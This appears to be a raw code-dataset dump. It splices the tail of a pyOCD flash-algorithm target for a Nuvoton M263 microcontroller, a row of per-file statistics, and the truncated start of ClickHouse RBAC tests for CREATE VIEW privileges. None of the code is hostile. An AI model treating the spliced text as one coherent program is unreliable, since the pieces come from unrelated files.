    0x2001e7ff, 0xe0269006, 0x68014815, 0x43112204, 0x48146001, 0x43116801, 0xe7ff6001, 0x68004812,
    0x42082110, 0xe7ffd101, 0x4810e7f8, 0x22016801, 0x60014311, 0x600a490e, 0x42106800, 0xe7ffd103,
    0x90062001, 0x4809e007, 0x22406801, 0x60014311, 0x90062000, 0x9806e7ff, 0xbdb0b007, 0x40000100,
    0x40000200, 0x40000204, 0x40000250, 0x4000c000, 0x4000c01c, 0x4601b082, 0x91009001, 0x4809e7ff,
    0x21016800, 0xd0014208, 0xe7f8e7ff, 0x68014806, 0x43912201, 0x48056001, 0x60012100, 0xb0024608,
    0x46c04770, 0x4000c0c0, 0x4000c000, 0x4000c01c, 0xb084b580, 0x90034601, 0x22019803, 0x43980713,
    0x98039003, 0x40184b0e, 0x98039003, 0x051b230f, 0x05524018, 0x91014290, 0xe7ffd107, 0x49099803,
    0x90031840, 0x90022001, 0x2000e002, 0xe7ff9002, 0x9a029903, 0xf7ff2022, 0xb004ff13, 0x46c0bd80,
    0xfffff800, 0xffe00000, 0xb086b580, 0x4603460a, 0x91039004, 0x90022000, 0x93009201, 0x9802e7ff,
    0x42889903, 0xe7ffd20f, 0x99029804, 0x92021c4a, 0x58400089, 0xffbcf7ff, 0xd0032800, 0x2001e7ff,
    0xe0039005, 0x2000e7eb, 0xe7ff9005, 0xb0069805, 0x46c0bd80, 0xb087b5b0, 0x460c4613, 0x90054605,
    0x92039104, 0x1cc09804, 0x43882103, 0x98059004, 0x07092101, 0x90054388, 0x94019302, 0xe7ff9500,
    0x68004822, 0x42082101, 0xe7ffd001, 0x4820e7f8, 0x22406801, 0x60014311, 0x2121481e, 0xe7ff6001,
    0x28009804, 0xe7ffd02c, 0x491b9805, 0x98036008, 0x491a6800, 0x481a6008, 0x60012101, 0x8f6ff3bf,
    0x4812e7ff, 0x21016800, 0xd0014208, 0xe7f8e7ff, 0x6800480f, 0x42082140, 0xe7ffd008, 0x6801480c,
    0x43112240, 0x20016001, 0xe00c9006, 0x1d009805, 0x98039005, 0x90031d00, 0x1f009804, 0xe7cf9004,
    0x90062000, 0x9806e7ff, 0xbdb0b007, 0x4000c0c0, 0x4000c000, 0x4000c00c, 0x4000c004, 0x4000c008,
    0x4000c010, 0xb088b5b0, 0x460c4613, 0x90064605, 0x92049105, 0x1cc09805, 0x43882103, 0x98069005,
    0x07092101, 0x90034008, 0x43889806, 0x93029006, 0x95009401, 0x4826e7ff, 0x21016800, 0xd0014208,
    0xe7f8e7ff, 0x68014823, 0x43112240, 0x48226001, 0x60012100, 0x9805e7ff, 0xd0322800, 0x9806e7ff,
    0x6008491e, 0x2101481e, 0xf3bf6001, 0xe7ff8f6f, 0x68004817, 0x42082101, 0xe7ffd001, 0x4815e7f8,
    0x21406800, 0xd0084208, 0x4812e7ff, 0x22406801, 0x60014311, 0x90072001, 0x4812e016, 0x99046800,
    0x42886809, 0xe7ffd003, 0x90072001, 0x9806e00c, 0x90061d00, 0x1d009804, 0x98059004, 0x90051f00,
    0x2000e7c9, 0xe7ff9007, 0xb0089807, 0x46c0bdb0, 0x4000c0c0, 0x4000c000, 0x4000c00c, 0x4000c004,
    0x4000c010, 0x4000c008, 0x00000000
    ],

    # Relative function addresses
    'pc_init': 0x200000d5,
    'pc_unInit': 0x20000175,
    'pc_program_page': 0x20000255,
    'pc_erase_sector': 0x200001b1,
    'pc_eraseAll': 0x0,          # 0x0: no chip-erase entry point provided

    # RAM layout: code base + header + code size.
    'static_base' : 0x20000000 + 0x00000020 + 0x000003e8,
    'begin_stack' : 0x20000700,
    'begin_data' : 0x20000000 + 0x1000,
    'page_size' : 0x800,
    'analyzer_supported' : False,
    'analyzer_address' : 0x00000000,
    'page_buffers' : [0x20001000, 0x20001800],   # Enable double buffering
    'min_program_length' : 0x800,

    # Flash information
    'flash_start': 0x0,
    'flash_size': 0x80000,       # 512 KiB APROM
    'sector_sizes': (
        (0x0, 0x800),
    )
}
# Flash programming algorithm for the 4 KiB LDROM (loader flash) bank.
# NOTE(review): the machine code and RAM layout are identical to
# FLASH_ALGO_AP_512 above -- only 'flash_start' and 'flash_size' differ.
FLASH_ALGO_LD_4 = {
    'load_address' : 0x20000000,
    # Flash algorithm machine code (Thumb), one 32-bit word per element.
    'instructions': [
    0xE00ABE00, 0x062D780D, 0x24084068, 0xD3000040, 0x1E644058, 0x1C49D1FA, 0x2A001E52, 0x4770D1F2,
    0xb087b5b0, 0x460c4613, 0x90054605, 0x92039104, 0x94019302, 0xe7ff9500, 0x6800481f, 0x42082101,
    0xe7ffd001, 0x481de7f8, 0x22406801, 0x60014311, 0x491b9805, 0x98046008, 0x6008491a, 0x28009803,
    0xe7ffd105, 0x43c02000, 0x60084917, 0x4816e003, 0x60014916, 0x4816e7ff, 0x60012101, 0x8f6ff3bf,
    0x480de7ff, 0x21016800, 0xd0014208, 0xe7f8e7ff, 0x6800480a, 0x42082140, 0xe7ffd008, 0x68014807,
    0x43112240, 0x20016001, 0xe0029006, 0x90062000, 0x9806e7ff, 0xbdb0b007, 0x4000c0c0, 0x4000c000,
    0x4000c00c, 0x4000c004, 0x4000c008, 0x0055aa03, 0x4000c010, 0xb087b5b0, 0x460c4613, 0x90054605,
    0x92039104, 0x2159481d, 0x21166001, 0x21886001, 0x68006001, 0x42082101, 0x94019302, 0xd1039500,
    0x2001e7ff, 0xe0269006, 0x68014815, 0x43112204, 0x48146001, 0x43116801, 0xe7ff6001, 0x68004812,
    0x42082110, 0xe7ffd101, 0x4810e7f8, 0x22016801, 0x60014311, 0x600a490e, 0x42106800, 0xe7ffd103,
    0x90062001, 0x4809e007, 0x22406801, 0x60014311, 0x90062000, 0x9806e7ff, 0xbdb0b007, 0x40000100,
    0x40000200, 0x40000204, 0x40000250, 0x4000c000, 0x4000c01c, 0x4601b082, 0x91009001, 0x4809e7ff,
    0x21016800, 0xd0014208, 0xe7f8e7ff, 0x68014806, 0x43912201, 0x48056001, 0x60012100, 0xb0024608,
    0x46c04770, 0x4000c0c0, 0x4000c000, 0x4000c01c, 0xb084b580, 0x90034601, 0x22019803, 0x43980713,
    0x98039003, 0x40184b0e, 0x98039003, 0x051b230f, 0x05524018, 0x91014290, 0xe7ffd107, 0x49099803,
    0x90031840, 0x90022001, 0x2000e002, 0xe7ff9002, 0x9a029903, 0xf7ff2022, 0xb004ff13, 0x46c0bd80,
    0xfffff800, 0xffe00000, 0xb086b580, 0x4603460a, 0x91039004, 0x90022000, 0x93009201, 0x9802e7ff,
    0x42889903, 0xe7ffd20f, 0x99029804, 0x92021c4a, 0x58400089, 0xffbcf7ff, 0xd0032800, 0x2001e7ff,
    0xe0039005, 0x2000e7eb, 0xe7ff9005, 0xb0069805, 0x46c0bd80, 0xb087b5b0, 0x460c4613, 0x90054605,
    0x92039104, 0x1cc09804, 0x43882103, 0x98059004, 0x07092101, 0x90054388, 0x94019302, 0xe7ff9500,
    0x68004822, 0x42082101, 0xe7ffd001, 0x4820e7f8, 0x22406801, 0x60014311, 0x2121481e, 0xe7ff6001,
    0x28009804, 0xe7ffd02c, 0x491b9805, 0x98036008, 0x491a6800, 0x481a6008, 0x60012101, 0x8f6ff3bf,
    0x4812e7ff, 0x21016800, 0xd0014208, 0xe7f8e7ff, 0x6800480f, 0x42082140, 0xe7ffd008, 0x6801480c,
    0x43112240, 0x20016001, 0xe00c9006, 0x1d009805, 0x98039005, 0x90031d00, 0x1f009804, 0xe7cf9004,
    0x90062000, 0x9806e7ff, 0xbdb0b007, 0x4000c0c0, 0x4000c000, 0x4000c00c, 0x4000c004, 0x4000c008,
    0x4000c010, 0xb088b5b0, 0x460c4613, 0x90064605, 0x92049105, 0x1cc09805, 0x43882103, 0x98069005,
    0x07092101, 0x90034008, 0x43889806, 0x93029006, 0x95009401, 0x4826e7ff, 0x21016800, 0xd0014208,
    0xe7f8e7ff, 0x68014823, 0x43112240, 0x48226001, 0x60012100, 0x9805e7ff, 0xd0322800, 0x9806e7ff,
    0x6008491e, 0x2101481e, 0xf3bf6001, 0xe7ff8f6f, 0x68004817, 0x42082101, 0xe7ffd001, 0x4815e7f8,
    0x21406800, 0xd0084208, 0x4812e7ff, 0x22406801, 0x60014311, 0x90072001, 0x4812e016, 0x99046800,
    0x42886809, 0xe7ffd003, 0x90072001, 0x9806e00c, 0x90061d00, 0x1d009804, 0x98059004, 0x90051f00,
    0x2000e7c9, 0xe7ff9007, 0xb0089807, 0x46c0bdb0, 0x4000c0c0, 0x4000c000, 0x4000c00c, 0x4000c004,
    0x4000c010, 0x4000c008, 0x00000000
    ],

    # Relative function addresses
    'pc_init': 0x200000d5,
    'pc_unInit': 0x20000175,
    'pc_program_page': 0x20000255,
    'pc_erase_sector': 0x200001b1,
    'pc_eraseAll': 0x0,          # 0x0: no chip-erase entry point provided

    # RAM layout: code base + header + code size.
    'static_base' : 0x20000000 + 0x00000020 + 0x000003e8,
    'begin_stack' : 0x20000700,
    'begin_data' : 0x20000000 + 0x1000,
    'page_size' : 0x800,
    'analyzer_supported' : False,
    'analyzer_address' : 0x00000000,
    'page_buffers' : [0x20001000, 0x20001800],   # Enable double buffering
    'min_program_length' : 0x800,

    # Flash information
    'flash_start': 0x100000,
    'flash_size': 0x1000,        # 4 KiB LDROM
    'sector_sizes': (
        (0x0, 0x800),
    )
}
class M263KIAAE(CoreSightTarget):
    """Nuvoton M263KIAAE CoreSight target.

    Memory map: 512 KiB APROM boot flash at 0x0, 4 KiB LDROM at 0x100000,
    and 0x18000 (96 KiB) of SRAM at 0x20000000.
    """

    VENDOR = "Nuvoton"

    memoryMap = MemoryMap(
        # Application flash (APROM); marked as the boot memory.
        FlashRegion( start=0x00000000, length=0x80000, sector_size=0x0800,
                     page_size=0x0800,
                     is_boot_memory=True,
                     algo=FLASH_ALGO_AP_512),
        # Loader flash (LDROM).
        FlashRegion( start=0x00100000, length=0x1000, sector_size=0x0800,
                     page_size=0x0800,
                     algo=FLASH_ALGO_LD_4),
        RamRegion( start=0x20000000, length=0x18000)
        )

    def __init__(self, link):
        super(M263KIAAE, self).__init__(link, self.memoryMap)
        # NOTE(review): uses the M261-series SVD file -- presumably
        # register-compatible with the M263; confirm against vendor data.
        self._svd_location = SVDFile.from_builtin("M261_v1.svd")
| 59.030675
| 99
| 0.744336
| 854
| 9,622
| 8.302108
| 0.395785
| 0.022567
| 0.03385
| 0.03385
| 0.850494
| 0.850494
| 0.842031
| 0.842031
| 0.842031
| 0.842031
| 0
| 0.546388
| 0.169923
| 9,622
| 162
| 100
| 59.395062
| 0.341305
| 0.077219
| 0
| 0.793893
| 0
| 0
| 0.051485
| 0
| 0
| 0
| 0.631365
| 0
| 0
| 1
| 0.007634
| false
| 0
| 0.030534
| 0
| 0.061069
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
60b006324cff30289f01c8333639af9249888759
| 60,333
|
py
|
Python
|
tests/testflows/rbac/tests/views/view.py
|
mikhno-s/ClickHouse
|
83e95cd0120da00a60506fcf2f4d23d908c45977
|
[
"Apache-2.0"
] | 2
|
2021-03-25T06:53:00.000Z
|
2021-04-29T07:32:51.000Z
|
tests/testflows/rbac/tests/views/view.py
|
mikhno-s/ClickHouse
|
83e95cd0120da00a60506fcf2f4d23d908c45977
|
[
"Apache-2.0"
] | 1
|
2020-03-26T01:50:51.000Z
|
2020-03-26T01:50:51.000Z
|
tests/testflows/rbac/tests/views/view.py
|
mikhno-s/ClickHouse
|
83e95cd0120da00a60506fcf2f4d23d908c45977
|
[
"Apache-2.0"
] | null | null | null |
from testflows.core import *
from testflows.asserts import error
from rbac.requirements import *
from rbac.helper.common import *
import rbac.helper.errors as errors
@TestSuite
@Requirements(
    RQ_SRS_006_RBAC_View_Create("1.0"),
)
def create(self, node=None):
    """Test the RBAC functionality of the `CREATE VIEW` command.

    Runs every CREATE VIEW scenario, in order.
    """
    scenarios = (
        create_without_create_view_privilege,
        create_with_create_view_privilege_granted_directly_or_via_role,
        create_with_revoked_create_view_privilege_revoked_directly_or_from_role,
        create_without_source_table_privilege,
        create_with_source_table_privilege_granted_directly_or_via_role,
        create_with_subquery_privilege_granted_directly_or_via_role,
        create_with_join_query_privilege_granted_directly_or_via_role,
        create_with_union_query_privilege_granted_directly_or_via_role,
        create_with_join_union_subquery_privilege_granted_directly_or_via_role,
        create_with_nested_views_privilege_granted_directly_or_via_role,
    )
    for scenario in scenarios:
        Scenario(run=scenario)
@TestScenario
def create_without_create_view_privilege(self, node=None):
    """Check that user is unable to create a view without CREATE VIEW privilege."""
    user_name = f"user_{getuid()}"
    view_name = f"view_{getuid()}"
    # Expected failure for a user lacking the privilege.
    exitcode, message = errors.not_enough_privileges(name=user_name)
    node = self.context.node if node is None else node
    with user(node, user_name):
        with When("I try to create a view without CREATE VIEW privilege as the user"):
            node.query(f"DROP VIEW IF EXISTS {view_name}")
            node.query(
                f"CREATE VIEW {view_name} AS SELECT 1",
                settings=[("user", user_name)],
                exitcode=exitcode,
                message=message,
            )
@TestScenario
def create_with_create_view_privilege_granted_directly_or_via_role(self, node=None):
    """Check that user is able to create a view with CREATE VIEW privilege, either granted directly or through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    # Direct grant: the privilege is given straight to the user.
    with user(node, f"{user_name}"):
        Scenario(test=create_with_create_view_privilege,
            name="create with create view privilege granted directly")(grant_target_name=user_name, user_name=user_name)
    # Grant via role: the privilege is given to a role held by the user.
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Scenario(test=create_with_create_view_privilege,
            name="create with create view privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_create_view_privilege(self, grant_target_name, user_name, node=None):
    """Check that user is able to create a view with the granted privileges.

    :param grant_target_name: user or role receiving the CREATE VIEW grant
    :param user_name: user that executes the CREATE VIEW statement
    """
    view_name = f"view_{getuid()}"
    if node is None:
        node = self.context.node
    try:
        with When("I grant the CREATE VIEW privilege"):
            node.query(f"DROP VIEW IF EXISTS {view_name}")
            node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
        # Step name fixed: the privilege was just granted above, so the
        # creation is expected to succeed (the old name said "without privilege").
        with Then("I try to create a view with privilege as the user"):
            node.query(f"CREATE VIEW {view_name} AS SELECT 1", settings = [("user", f"{user_name}")])
    finally:
        # Cleanup uses Finally (not Then), consistent with the other outlines
        # in this file.
        with Finally("I drop the view"):
            node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_revoked_create_view_privilege_revoked_directly_or_from_role(self, node=None):
    """Check that user is unable to create view after the CREATE VIEW privilege is revoked, either directly or from a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    # Privilege granted and revoked directly on the user.
    with user(node, f"{user_name}"):
        Scenario(test=create_with_revoked_create_view_privilege,
            name="create with create view privilege revoked directly")(grant_target_name=user_name, user_name=user_name)
    # Privilege granted and revoked on a role that the user holds.
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Scenario(test=create_with_revoked_create_view_privilege,
            name="create with create view privilege revoked from a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_revoked_create_view_privilege(self, grant_target_name, user_name, node=None):
    """Revoke CREATE VIEW privilege and check the user is unable to create a view.

    :param grant_target_name: user or role the privilege is granted to and revoked from
    :param user_name: user that attempts the CREATE VIEW statement
    """
    view_name = f"view_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    if node is None:
        node = self.context.node
    with When("I grant CREATE VIEW privilege"):
        node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
    with And("I revoke CREATE VIEW privilege"):
        node.query(f"REVOKE CREATE VIEW ON {view_name} FROM {grant_target_name}")
    with Then("I try to create a view on the table as the user"):
        # After the revoke, creation must fail with "not enough privileges".
        node.query(f"CREATE VIEW {view_name} AS SELECT 1", settings = [("user", f"{user_name}")],
            exitcode=exitcode, message=message)
@TestScenario
def create_without_source_table_privilege(self, node=None):
    """Check that user is unable to create a view without select
    privilege on the source table.
    """
    user_name = f"user_{getuid()}"
    view_name = f"view_{getuid()}"
    table_name = f"table_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    if node is None:
        node = self.context.node
    with table(node, f"{table_name}"):
        with user(node, f"{user_name}"):
            with When("I grant CREATE VIEW privilege to a user"):
                node.query(f"GRANT CREATE VIEW ON {view_name} TO {user_name}")
            # CREATE VIEW alone is not enough: SELECT on the source table is
            # also required, so the query below must fail.
            with Then("I try to create a view without select privilege on the table"):
                node.query(f"CREATE VIEW {view_name} AS SELECT * FROM {table_name}", settings = [("user", f"{user_name}")],
                    exitcode=exitcode, message=message)
@TestScenario
def create_with_source_table_privilege_granted_directly_or_via_role(self, node=None):
    """Check that a user is able to create a view if and only if the user has create view privilege and
    select privilege on the source table, either granted directly or through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    # Privileges granted directly to the user.
    with user(node, f"{user_name}"):
        Scenario(test=create_with_source_table_privilege,
            name="create with create view and select privilege granted directly")(grant_target_name=user_name, user_name=user_name)
    # Privileges granted to a role held by the user.
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Scenario(test=create_with_source_table_privilege,
            name="create with create view and select privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_source_table_privilege(self, user_name, grant_target_name, node=None):
    """Check that user is able to create a view when granted both CREATE VIEW
    privilege on the view and SELECT privilege on the source table.

    (Docstring corrected: this is the positive case -- the previous wording
    described the negative "without SELECT" case handled elsewhere.)
    """
    view_name = f"view_{getuid()}"
    table_name = f"table_{getuid()}"
    if node is None:
        node = self.context.node
    with table(node, f"{table_name}"):
        try:
            with When("I grant CREATE VIEW privilege"):
                node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
            with And("I grant SELECT privilege"):
                node.query(f"GRANT SELECT ON {table_name} TO {grant_target_name}")
            with And("I try to create a view on the table as the user"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
                node.query(f"CREATE VIEW {view_name} AS SELECT * FROM {table_name}", settings = [("user", f"{user_name}")])
            with Then("I check the view"):
                # The freshly created source table is empty, so the view must
                # return zero rows.
                output = node.query(f"SELECT count(*) FROM {view_name}").output
                assert output == '0', error()
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_subquery_privilege_granted_directly_or_via_role(self, node=None):
    """Check that user is able to create a view where the stored query has two subqueries
    if and only if the user has SELECT privilege on all of the tables,
    either granted directly or through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    # Privileges granted directly to the user.
    with user(node, f"{user_name}"):
        Scenario(test=create_with_subquery,
            name="create with subquery, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
    # Privileges granted to a role held by the user.
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Scenario(test=create_with_subquery,
            name="create with subquery, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_subquery(self, user_name, grant_target_name, node=None):
    """Grant select and create view privileges and check that user is able to create a view
    if and only if they have all necessary privileges.

    The stored query contains two nested subqueries over three tables; every
    partial SELECT-grant permutation must fail, and only the full grant
    must succeed.
    """
    view_name = f"view_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    table2_name = f"table2_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    create_view_query = "CREATE VIEW {view_name} AS SELECT * FROM {table0_name} WHERE y IN (SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {table2_name} WHERE y<2))"
    if node is None:
        node = self.context.node
    with table(node, f"{table0_name},{table1_name},{table2_name}"):
        try:
            with When("I grant CREATE VIEW privilege"):
                node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
            # No SELECT granted yet, so creation must fail.
            with Then("I attempt to CREATE VIEW as the user with create privilege"):
                node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name, table2_name=table2_name), settings = [("user", f"{user_name}")],
                    exitcode=exitcode, message=message)
            # Each permutation grants SELECT on a proper subset of the three
            # tables; creation is still expected to fail every time.
            for permutation in permutations(table_count=3):
                with grant_select_on_table(node, permutation, grant_target_name, table0_name, table1_name, table2_name) as tables_granted:
                    with When(f"permutation={permutation}, tables granted = {tables_granted}"):
                        with Given("I don't have a view"):
                            node.query(f"DROP VIEW IF EXISTS {view_name}")
                        with Then("I attempt to create a view as the user"):
                            node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name, table2_name=table2_name), settings = [("user", f"{user_name}")],
                                exitcode=exitcode, message=message)
            # With SELECT on every table the creation must succeed.
            with When("I grant select on all tables"):
                with grant_select_on_table(node, max(permutations(table_count=3))+1, grant_target_name, table0_name, table1_name, table2_name):
                    with Given("I don't have a view"):
                        node.query(f"DROP VIEW IF EXISTS {view_name}")
                    with Then("I attempt to create a view as the user"):
                        node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name, table2_name=table2_name), settings = [("user", f"{user_name}")])
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_join_query_privilege_granted_directly_or_via_role(self, node=None):
    """Check that user is able to create a view where the stored query includes a `JOIN` statement
    if and only if the user has SELECT privilege on all of the tables,
    either granted directly or through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    # Privileges granted directly to the user.
    with user(node, f"{user_name}"):
        Scenario(test=create_with_join_query,
            name="create with join query, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
    # Privileges granted to a role held by the user.
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Scenario(test=create_with_join_query,
            name="create with join query, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_join_query(self, grant_target_name, user_name, node=None):
    """Grant select and create view privileges and check that user is able to create a view
    if and only if they have all necessary privileges.

    The stored query joins two tables; creation must fail for every partial
    SELECT grant and succeed once SELECT is granted on both tables.

    :param grant_target_name: user or role receiving the grants
    :param user_name: user that executes the CREATE VIEW statement
    """
    view_name = f"view_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    create_view_query = "CREATE VIEW {view_name} AS SELECT * FROM {table0_name} JOIN {table1_name} USING d"
    if node is None:
        node = self.context.node
    with table(node, f"{table0_name},{table1_name}"):
        try:
            with When("I grant CREATE VIEW privilege"):
                node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
            # No SELECT granted yet, so creation must fail.
            with Then("I attempt to create view as the user"):
                node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name), settings = [("user", f"{user_name}")],
                    exitcode=exitcode, message=message)
            # Partial SELECT grants: creation is still expected to fail.
            for permutation in permutations(table_count=2):
                with grant_select_on_table(node, permutation, grant_target_name, table0_name, table1_name) as tables_granted:
                    with When(f"permutation={permutation}, tables granted = {tables_granted}"):
                        with Given("I don't have a view"):
                            node.query(f"DROP VIEW IF EXISTS {view_name}")
                        with Then("I attempt to create a view as the user"):
                            node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name), settings = [("user", f"{user_name}")],
                                exitcode=exitcode, message=message)
            # SELECT on both tables: creation must succeed.
            with When("I grant select on all tables"):
                with grant_select_on_table(node, max(permutations(table_count=2))+1, grant_target_name, table0_name, table1_name):
                    with Given("I don't have a view"):
                        node.query(f"DROP VIEW IF EXISTS {view_name}")
                    with Then("I attempt to create a view as the user"):
                        node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name), settings = [("user", f"{user_name}")])
        finally:
            # Cleanup changed from Then to Finally for consistency with every
            # other outline's finally block in this file.
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_union_query_privilege_granted_directly_or_via_role(self, node=None):
    """Check that user is able to create a view where the stored query includes a `UNION ALL` statement
    if and only if the user has SELECT privilege on all of the tables,
    either granted directly or through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    # Privileges granted directly to the user.
    with user(node, f"{user_name}"):
        Scenario(test=create_with_union_query,
            name="create with union query, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
    # Privileges granted to a role held by the user.
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Scenario(test=create_with_union_query,
            name="create with union query, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_union_query(self, grant_target_name, user_name, node=None):
    """Grant select and create view privileges and check that user is able to create a view
    if and only if they have all necessary privileges.

    The stored query UNION ALLs two tables; creation must fail for every
    partial SELECT grant and succeed once SELECT is granted on both.
    """
    view_name = f"view_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    create_view_query = "CREATE VIEW {view_name} AS SELECT * FROM {table0_name} UNION ALL SELECT * FROM {table1_name}"
    if node is None:
        node = self.context.node
    with table(node, f"{table0_name},{table1_name}"):
        try:
            with When("I grant CREATE VIEW privilege"):
                node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
            # No SELECT granted yet, so creation must fail.
            with Then("I attempt to create view as the user"):
                node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name), settings = [("user", f"{user_name}")],
                    exitcode=exitcode, message=message)
            # Partial SELECT grants: creation is still expected to fail.
            for permutation in permutations(table_count=2):
                with grant_select_on_table(node, permutation, grant_target_name, table0_name, table1_name) as tables_granted:
                    with When(f"permutation={permutation}, tables granted = {tables_granted}"):
                        with Given("I don't have a view"):
                            node.query(f"DROP VIEW IF EXISTS {view_name}")
                        with Then("I attempt to create a view as the user"):
                            node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name), settings = [("user", f"{user_name}")],
                                exitcode=exitcode, message=message)
            # SELECT on both tables: creation must succeed.
            with When("I grant select on all tables"):
                with grant_select_on_table(node, max(permutations(table_count=2))+1, grant_target_name, table0_name, table1_name):
                    with Given("I don't have a view"):
                        node.query(f"DROP VIEW IF EXISTS {view_name}")
                    with Then("I attempt to create a view as the user"):
                        node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name), settings = [("user", f"{user_name}")])
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_join_union_subquery_privilege_granted_directly_or_via_role(self, node=None):
    """Check that user is able to create a view with a stored query that includes `UNION ALL`, `JOIN` and two subqueries
    if and only if the user has SELECT privilege on all of the tables, either granted directly or through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    # Privileges granted directly to the user.
    with user(node, f"{user_name}"):
        Scenario(test=create_with_join_union_subquery,
            name="create with join union subquery, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
    # Privileges granted to a role held by the user.
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Scenario(test=create_with_join_union_subquery,
            name="create with join union subquery, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_join_union_subquery(self, grant_target_name, user_name, node=None):
    """Grant select and create view privileges and check that user is able to create a view
    if and only if they have all necessary privileges.

    The stored query combines JOIN, UNION ALL and two nested subqueries over
    tables 0, 1, 3 and 4.
    """
    view_name = f"view_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    table2_name = f"table2_{getuid()}"
    table3_name = f"table3_{getuid()}"
    table4_name = f"table4_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    # NOTE(review): {table2_name} does not appear in this query text, although
    # table2 is created and passed to .format() below (extra kwargs are
    # silently ignored by str.format) -- confirm whether table2 was meant to
    # be referenced.
    create_view_query = "CREATE VIEW {view_name} AS SELECT y FROM {table0_name} JOIN {table1_name} USING y UNION ALL SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {table3_name} WHERE y IN (SELECT y FROM {table4_name} WHERE y<2))"
    if node is None:
        node = self.context.node
    with table(node, f"{table0_name},{table1_name},{table2_name},{table3_name},{table4_name}"):
        # NOTE(review): the calling scenario already creates this user; this
        # extra user() context is not present in the sibling outlines --
        # confirm it is intended.
        with user(node, f"{user_name}"):
            try:
                with When("I grant CREATE VIEW privilege"):
                    node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
                # No SELECT granted yet, so creation must fail.
